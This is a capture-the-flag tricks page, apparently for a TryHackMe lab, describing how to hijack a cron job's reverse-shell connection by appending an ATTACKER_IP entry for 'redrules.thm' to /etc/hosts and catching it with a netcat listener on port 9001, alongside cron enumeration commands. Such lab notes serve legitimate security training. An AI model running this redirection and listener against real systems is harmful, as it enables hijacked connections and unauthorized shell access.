> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/process-hijacking/trick-0003.md).

# Hijack Reverse Shell via /etc/hosts

***

Modify the `/etc/hosts` file on the target machine to point the target hostname (e.g., `redrules.thm`) to your attacker IP. This requires write access to the file, potentially found via tools like `linpeas` or manual checks (`ls -l /etc/hosts`).

If a periodic process connects to this hostname, the modified entry in `/etc/hosts` will force the connection to your machine instead of the legitimate target. Cron jobs, which are Linux’s version of scheduled tasks, are common examples of such processes. They can be set to run at practically any interval. The `crond` daemon enables cron functionality and reads crontabs (cron tables) to execute any predefined scripts or commands that are listed.

To identify such cron jobs, you can investigate various locations:

* The system crontab, typically `/etc/crontab`. The default system crontab configuration file is located at `/etc/crontab` and is used to schedule system-wide jobs. You can view its contents using:

  ```bash
  cat /etc/crontab
  ```

  Within this file, you can often see the cron `SHELL` and cron `PATH`, which are essentially the crontab's environmental variables. The cron `SHELL` is used to execute the cron job (e.g., `/bin/sh -c <command>`), and the cron `PATH` works like a user’s `PATH`, determining where the system looks for binaries if absolute paths are not specified in cron commands.
* Other cron directories: Scripts might also be scheduled by being placed in directories such as `/etc/cron.hourly/` (run once an hour), `/etc/cron.daily/` (run once a day), `/etc/cron.weekly/` (run once a week), and `/etc/cron.monthly/` (run once a month). Jobs can also be defined in files within `/etc/cron.d/`. You can list these directories and their contents to check for custom jobs:

  ```bash
  ls -l /etc/cron*
  ```
* User-specific crontabs allow users to create and edit cron jobs that apply at the user level. These are typically created using `crontab -e` and stored in `/var/spool/cron/crontabs`. However, standard users often cannot directly list the contents of this directory or view other users' crontabs. For example, checking permissions on `/var/spool/cron/crontabs` might show restricted access:

  ```bash
  ls -l /var/spool/cron/crontabs
  ```

Tools like `linpeas` can be very effective in enumerating various system configurations, including cron jobs. For processes that are harder to find, such as "hidden" cron jobs or other periodically executing scripts making network connections, tools like `pspy64` are excellent for monitoring processes in real-time.

Assuming the target hostname is `redrules.thm` and the connection is expected on port `9001` (as identified by tools like `pspy64`), use the following steps:

```bash
# On target machine (as user with write access to /etc/hosts):
echo 'ATTACKER_IP redrules.thm' >> /etc/hosts
```

```bash
# On attacker machine, set up a listener:
nc -lvnp 9001
```

When the process attempts to connect to `redrules.thm`, it will resolve to `ATTACKER_IP`, and your listener on port `9001` will receive the connection.
